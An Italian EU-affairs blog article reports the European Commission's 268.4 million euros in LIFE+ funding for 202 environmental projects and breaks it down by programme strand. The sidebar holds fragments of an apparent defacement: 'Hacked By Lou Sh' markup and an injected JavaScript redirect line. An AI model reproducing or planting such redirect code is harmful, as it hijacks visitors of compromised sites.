EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

Programma LIFE+: in arrivo 268,4 milioni di euro per l’ambiente




202 i progetti di cofinanziamento selezionati da Bruxelles

In occasione del ventennale del programma LIFE, la Commissione europea ha stanziato 268,4 milioni di euro da destinare a ben 202 progetti, scrupolosamente selezionati tra le migliaia di richieste presentate dai 27 Stati membri e che comporteranno interventi mirati nei settori della tutela della natura, della politica ambientale, dell’informazione e della comunicazione in materia di questioni ambientali.

Del programma LIFE ne abbiamo già parlato qui, sottolineando come esso abbia rappresentato - e tuttora rappresenti - uno tra “i più importanti finanziamenti da parte dell’Unione europea a favore dell’ambiente”. È per questo che all’iniziativa aveva fatto seguito il programma LIFE+, riferito al periodo 2007-2013, ormai prossimo alla conclusione, e il nuovo programma LIFE, presentato nel dicembre scorso dalla Commissione e volto ad ampliare il raggio d’azione in materia ambientale grazie a un quadro finanziario pluriennale 2014-2020, che “fissi il quadro di bilancio e gli orientamenti principali della strategia Europa 2020”.

Ed è proprio in riferimento al programma LIFE+ - che ricordiamo ha una dotazione pari a 2,143 miliardi di euro per il periodo 2007-2013 - che la Commissione europea pubblica ogni anno un invito a presentare proposte di progetti LIFE+. All’ultimo bando, i cui termini sono scaduti proprio a luglio, i 27 Stati membri hanno risposto presentando 1.078 richieste, di cui 202 sono state selezionate per un cofinanziamento. L’investimento complessivo sarà pari a 516,5 milioni di euro, ma 268,4 milioni saranno coperti dal contributo dell’Unione.

Le dichiarazioni di Janez Potočnik

Janez Potočnik
Janez Potočnik è un politico sloveno. Attualmente ricopre il ruolo di Commissario europeo per l’Ambiente.

A presentare l’iniziativa è stato il Commissario per l’Ambiente, Janez Potočnik, che ha dichiarato: “In occasione del ventennale del programma LIFE e della direttiva "Habitat", ho il piacere di annunciare la prosecuzione del finanziamento di progetti ambientali di qualità elevata in tutta l’UE. Questi nuovi progetti LIFE+ si inseriscono in una tendenza instauratasi due decenni fa, a favore di azioni innovative e di migliori pratiche per rafforzare la tutela della natura, migliorare l’ambiente e affrontare i cambiamenti climatici”.

I progetti scelti per il cofinanziamento rientrano nell’ambito di tre componenti del programma: LIFE+ Natura e biodiversità, LIFE+ Politica e governance ambientali e LIFE+ Informazione e comunicazione.

LIFE+ Natura e biodiversità

I progetti che rientrano nell’ambito del programma LIFE+ Natura e biodiversità mirano a migliorare lo stato di conservazione sia delle specie che degli habitat in pericolo. Delle 268 proposte ricevute, la scelta della Commissione europea è ricaduta su 76 progetti, situati in 22 Stati membri, da finanziare “nell’ambito di partenariati conclusi da organismi di conservazione, enti governativi e altre parti interessate”. L’ammontare totale dell’investimento sarà di 241,8 milioni di euro, ma il contributo comunitario sarà di circa 136 milioni di euro. 71 dei progetti selezionati riguardano la natura e contribuiscono all’attuazione delle direttive "Uccelli" e/o "Habitat" e alla realizzazione della rete Natura 2000; i restanti cinque invece sono progetti che affrontano temi più ampi connessi alla biodiversità.

LIFE+ Politica e governance ambientali

Riguardo ai progetti facenti parte del programma LIFE+ Politica e governance ambientali questi saranno dei progetti cosiddetti pilota, volti a favorire lo sviluppo di strategie, tecnologie, metodi e strumenti innovativi. 607 le proposte ricevute in totale, 113 quelle scelte dalla Commissione. Si tratta di progetti che saranno finanziati da una vasta gamma di organizzazioni del settore pubblico e privato e che comporteranno un investimento complessivo pari a 258,4 milioni di euro, di cui 124,4 milioni saranno coperti dal contributo europeo.

La Commissione sosterrà inoltre con un ulteriore contributo di 31,4 milioni di euro 23 progetti sui cambiamenti climatici il cui investimento totale ammonta a 67,8 milioni di euro. Previsti poi anche altri progetti che “eserciteranno un impatto indiretto sulle emissioni di gas a effetto serra”. Altri due settori di interesse con 29 e 19 progetti saranno, infine, i rifiuti e l’acqua.

LIFE+ Informazione e comunicazione

I progetti facenti parte del programma LIFE+ Informazione e comunicazione avranno il compito di divulgare informazioni e mettere in luce le questioni ambientali, oltre che “promuovere la formazione e la sensibilizzazione sulla prevenzione degli incendi boschivi”. 203 le proposte ricevute, ma solo 13 i progetti scelti dalla Commissione e presentati da una serie di organizzazioni del settore pubblico e privato che si occupano di natura e/o dell’ambiente. I progetti, coordinati in 9 Stati membri, richiederanno un investimento globale di 16,2 milioni di euro, dei quali 7,2 milioni arriveranno dall’UE.



Nessun commento
ds Aggiungere un commento

Autori

Simone Buschi
Laureato in Scienze della comunicazione, curriculum politico-istituzionale, presso l’Università di Roma Tor vergata. Iscritto alla specialistica in Scienze dell’informazione, della comunicazione e (...)



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France